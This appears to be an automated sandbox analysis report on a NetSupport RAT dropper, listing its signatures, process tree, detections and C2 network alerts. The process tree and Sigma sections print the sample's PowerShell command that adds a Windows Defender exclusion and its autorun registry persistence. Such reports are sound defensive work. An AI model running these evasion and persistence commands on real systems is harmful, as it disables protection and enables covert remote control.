Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BUenB12U2a.exe

Overview

General Information

Sample name:BUenB12U2a.exe
renamed because original name is a hash value
Original sample name:9664f030fe62eaa5700779637bd7538d.exe
Analysis ID:1621635
MD5:9664f030fe62eaa5700779637bd7538d
SHA1:2602684192c5b8371a5cf9ecce6af2bb659b1cfb
SHA256:76198df455918be9c9570ad2199e38b0e8bf4b2ff11b9ed5ab3f0af8f9e3e275
Tags:exeNetSupportuser-abuse_ch
Infos:

Detection

NetSupport RAT
Score:92
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Found pyInstaller with non standard icon
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to record screenshots
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • BUenB12U2a.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\BUenB12U2a.exe" MD5: 9664F030FE62EAA5700779637BD7538D)
    • BUenB12U2a.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\BUenB12U2a.exe" MD5: 9664F030FE62EAA5700779637BD7538D)
      • cmd.exe (PID: 6356 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 3452 cmdline: C:\Users\user\AppData\Roaming\extracted\client32.exe MD5: C4F1B50E3111D29774F7525039FF7086)
      • powershell.exe (PID: 6352 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5664 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 5752 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • client32.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 932 cmdline: "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\extracted\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 39 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      9.2.client32.exe.72a00000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        9.2.client32.exe.6cde0658.4.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                          9.2.client32.exe.6cde0658.4.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            6.2.client32.exe.a60000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              12.2.client32.exe.10700000.1.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 29 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 6284, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 6352, ProcessName: powershell.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\extracted\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\BUenB12U2a.exe, ProcessId: 6284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client32
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 6284, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 6352, ProcessName: powershell.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 6284, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 6352, ProcessName: powershell.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-22T02:46:40.112439+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:46:47.874318+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:46:48.186922+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:46:48.578074+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:47:48.781474+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:48:48.875222+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for submitted file
                                Source: BUenB12U2a.exeVirustotal: Detection: 38%Perma Link
                                Source: BUenB12U2a.exeReversingLabs: Detection: 34%
                                Joe Sandbox ML detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C7980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,1_2_00007FFDFB0C7980
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CCB40 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0CCB40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FDB60 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0FDB60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11BB70 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB11BB70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B222A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFDFB0B222A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B23E7 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB0B23E7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B267B CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B267B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B150F OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,1_2_00007FFDFB0B150F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1CEE CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,1_2_00007FFDFB0B1CEE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1361 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFB0B1361
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B5C53 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,1_2_00007FFDFB0B5C53
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B13D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,1_2_00007FFDFB0B13D9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1C53 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0B1C53
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B23EC CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B23EC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FDAF0 CRYPTO_free,1_2_00007FFDFB0FDAF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB115B10 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB115B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D5AE0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0D5AE0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C5B10 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,1_2_00007FFDFB0C5B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C3B30 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB0C3B30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B107D CRYPTO_free,1_2_00007FFDFB0B107D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B204A CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB0B204A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D59F0 CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0D59F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A16 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B1A16
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C5A10 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,1_2_00007FFDFB0C5A10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B271B CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFB0B271B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB107A40 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB107A40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D5870 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0D5870
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B586A BIO_get_data,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_clear_flags,BIO_get_data,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,1_2_00007FFDFB0B586A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1138A0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,1_2_00007FFDFB1138A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,1_2_00007FFDFB0B1B18
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2590 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB0B2590
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1B31 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1B31
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB10F8F0 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFB10F8F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1D84 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB0B1D84
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1EDD CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1EDD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB121F70 CRYPTO_memcmp,1_2_00007FFDFB121F70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1D8E EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_MAC_init,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFB0B1D8E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BDFB2 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,1_2_00007FFDFB0BDFB2
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B103C CRYPTO_malloc,COMP_expand_block,1_2_00007FFDFB0B103C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E4000 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0E4000
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FE040 CRYPTO_free,1_2_00007FFDFB0FE040
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B24E6 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB0B24E6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D1E60 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,1_2_00007FFDFB0D1E60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B5E80 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,1_2_00007FFDFB0B5E80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B3EB0 CRYPTO_free,1_2_00007FFDFB0B3EB0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BDEC0 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0BDEC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CBEC0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB0CBEC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB129F10 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB129F10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B236F CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B236F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2027 CRYPTO_free,1_2_00007FFDFB0B2027
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B1AC3
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C5D80 CRYPTO_THREAD_run_once,1_2_00007FFDFB0C5D80
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B15E6 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,memcpy,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B15E6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1CE9 memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1CE9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B16A4 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B16A4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1F37 CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1F37
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB107CD0 CRYPTO_memcmp,1_2_00007FFDFB107CD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B19DD BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFB0B19DD
